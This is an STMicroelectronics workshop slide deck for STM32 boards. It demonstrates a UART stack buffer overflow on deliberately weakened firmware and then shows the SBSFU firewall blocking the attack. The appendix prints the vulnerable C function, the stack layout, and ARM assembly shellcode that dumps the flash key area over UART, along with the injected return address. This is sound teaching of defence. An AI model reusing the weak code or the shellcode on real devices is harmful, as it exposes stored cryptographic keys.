STM32 Security Workshop

05 Adding protections
 Adding protections hands-on

• Purpose :
• Experience a code injection attack
• Activate counter measure included in
SBSFU (Isolation) UART

• Hands-on scenario
• Experiment real code injection attack
• Activate firewall mechanism in SBSFU as
counter-measure

05-2
 What is an inner attack?

• The principle is
• Exploit a software weakness
• Inject malicious code
• Example : the buffer overflow
• Send more data than expected
• Software does not check the limit (weakness/bug)
• Results in data can be written at unexpected location
• Impacts system behaviour

05-3
 Simple example

• Receive command terminated by \n via UART

• Software only checks \n to detect end of command
• What is the possible weakness here ?
• => The command received may be longer than expected !

05-4
 Let’s build this weak code

• Open project C:\STM32SecuWS\L4\STM32L476_SimpleApp_WithWeakness

Open

Build
Check

3
05-5
 SBSFU security protection management

• By default SBSFU is delivered with all protections activated

• Isolation protections need to be removed for our experiment
• SBSFU provides one configuration file to setup all security protections
• Let’s change this app_sfu.h file!

05-6
 Open app_sfu.h from
STM32L476RG_NUCLEO_2_Images_SBSFU

05-7
Comment #define using Toggle Comment

Select the block

from line 151 to
170

2
05-8
 Block commented

Check line 170 is

the last line
commented 05-9
 Restore some protections

To Double click
uncomment to get code
manually snippet &
copy paste

app_sfu.h

WARNING ! CTRL-S
Save file after modification !
05-10
 Rebuild SBSFU
2

3
05-11
 Launch postbuild script

• 03_01_Postbuild_SimpleApp_WithWeakness.bat
• To combine SBSFU, UserApp_WithWeakness and header

05-12
 Update the target
• 00_ResetL4Target.bat
• 03_02_Flash_SBSFU_SimpleApp_WithWeakness.bat

05-13
 Restart the board

• Power on reset the board and then press reset button

05-14
 Check application is working

• Type command manually and press return

• Firmware will send “Message Received” and ask for new command

05-15
 Now everything is ready !

• We have an application firmware including a weakness

• This application is authenticated by SBSFU
• But remember we removed some protections
• We are in the field and hacker is attacking the device
• The injected code will read the flash content and write it to UART
• The address in flash points to key area for this example

05-16
 Send hack.bin to target
3

Go to :
C:\STM32SecuWS\L4\STM32L476_SimpleApp_WithWeakness

4
5

05-17
 Attack performed!

Hack reads the secret area and output it to UART

05-18
Reset after hack performed

Reset after hack performed because of watchdog

05-19
 Conclusion

• We performed a hack using a simple UART interface

• Interfaces with outside world means surface of attack
• Each open door is a way for hacker to tamper your assets !
• This demonstrates why isolation is very important !

05-20
 How SBSFU addresses Isolation

• SBSFU uses all available isolation mechanisms

• On STM32L4 we have
• The Firewall : Hardware mechanism that protects Flash and RAM specific areas
• The MPU : Cortex-M mechanism to give attributes to set of address range
• The PCROP : Set a specific part of flash in execute only (no read nor write)
• We will see what happens when activating the firewall
• But first a reminder of all protections applied by SBSFU

05-21
 SBSFU protection on STM32L4

User Flash SRAM1

Keys Secure Engine : Stack
Secure Engine Secure Engine
Code & constants Vdata

SBSFU SBSFU
Code & constants Vdata/Stack/Heap
---
Active image Legend
Download Image header Vdata/Stack/Heap
DAP
DAP WRP + MPU-RX
Download Image
FWALL (code) + WRP + MPU-RX
Active image header
FWALL (code) + WRP + PCROP + MPU-RX

Active Image FWALL (NVData) + MPU-RW

SWAP area FWALL (VData) + MPU-RW

IWDG MPU-RW (code/data)

DAP R: Read
RDP-L2 W: Write
Tamper X:
eXecute

05-22
 Activate firewall

• To activate the firewall

go back to app_sfu.h

1
Uncomment Firewall activation

CTRL-S

05-23
 Rebuild SBSFU
2

05-24
 Use scripts to prepare and flash the board

• As already done previously, launch scripts

• 00_ResetL4Target.bat
• 03_01_Postbuild_SimpleApp_WithWeakness.bat
• 03_02_Flash_SBSFU_SimpleApp_WithWeakness.bat
• Then power on reset the board when following message is displayed

05-25
 Perform the attack again

3
4

05-26
 Result with FIREWALL

When hack code is trying to access to secrets,

a reset is generated.

Firewall was triggered.

• SBSFU provides a framework for implementing your own specific action upon
detection of firewall reset
05-27
 That’s all for this hands-on

What did we learn ?

• Using a stack overflow can be used to inject code
• It is important to be able to isolate
• the critical parts (crypto related for instance)
• from the pure functional parts (communication)
• SBSFU implements all possible mechanisms to perform this
isolation
• SBSFU combines all these mechanisms

05-28
 Thank you !

Thank you

© STMicroelectronics - All rights reserved.

The STMicroelectronics corporate logo is a registered trademark of the STMicroelectronics
group of companies. All other names are the property of their respective owners. 29
Appendix
How attack is actually performed
 The weak code !
static void ReadUARTBuffer(void) ReadUARTBuffer:
{ push {r7, lr}
uint8_t buffer[48] = { 0 }; sub sp, #48 ; 0x30 At function entry the
indexBuffer=0; add r7, sp, #0 compiler pushes the
... return address and 1
while (1)
working register on the
{
stack and uses also the
if (HAL_UART_Receive(&huart2, &recChar, 1, 1000) == HAL_OK)
stack to allocate the local
{
variables.
if (recChar == '\n')
{
HAL_UART_Transmit(&huart2, (uint8_t *)"Message received\n", 17, 1000);
break;
}
else
{
buffer[indexBuffer] = recChar;
indexBuffer++; Then, at the end of the
... function, the local
} adds r7, #48 ; 0x30
} variables are ‘dis
mov sp, r7 allocated’ and register
IWDG->KR= IWDG_KEY_RELOAD; pop {r7, pc}
} and return address
} restored

05-41
 How the stack looks like in such case
End of stack (low addresses)

Available stack

Buffer[0] First element of the buffer

…
Buffer[N-1] Last index of the buffer. UART command read shouldn’t go further
R7
2 last words on the stack may be overwritten if attacker sends enough data.
LR (return address)
This is where the attack can take place
Stack from caller

Beginning of stack : High address

05-42
 How the attack can be performed ?

Remaining stack

Buffer[0]

… Malicious code can be injected here

Buffer[N-1]
R7
LR (return address) • The last word (LR) is the return address.
• Attacker can replace it with the address of the beginning of his
Stack from caller
assembly code

05-43
 Example of assembly code for attack
Purpose of this code: read flash content and send it on UART
hack:
start:
CPSID I // disable interrupts
MOV R2, #0x441C // UART_ISR register address
MOVT R2, #0x4000
MOV R3, #0x03F0 // Flash address containing keys
MOVT R3, #0x0800
MOV R4, #256 // Number of bytes to read
send_byte:
LDRB R1, [R3], #1 // Read one byte in flash
STRB R1, [R2, #12] // Send byte to UART_TDR register
wait_complete:
LDR R6, [R2, #0] // Read UART ISR
ANDS R6, R6, #64 // Check End of Transmit flag
CMP R6, #0 // R6 is 0 if character not transmitted yet
BEQ.N wait_complete
SUB R4, R4, 1
CMP R4, #0
BNE send_byte // R6 different from 0, we can send next byte
NOP // NOP to be added to fit the exact buffer size
NOP
NOP 05-44
.end
 From hack code to data injected

• The hacking code is assembled to obtain the binary data to be injected

• Then, most complex thing is to find the additional content in overflow part
• This additional part should contain the address to jump to.
• Finding this address requires trial and error and could be long

Content of
hack.bin

Return address : 0x20017FC1

At beginning of the buffer on the stack
05-45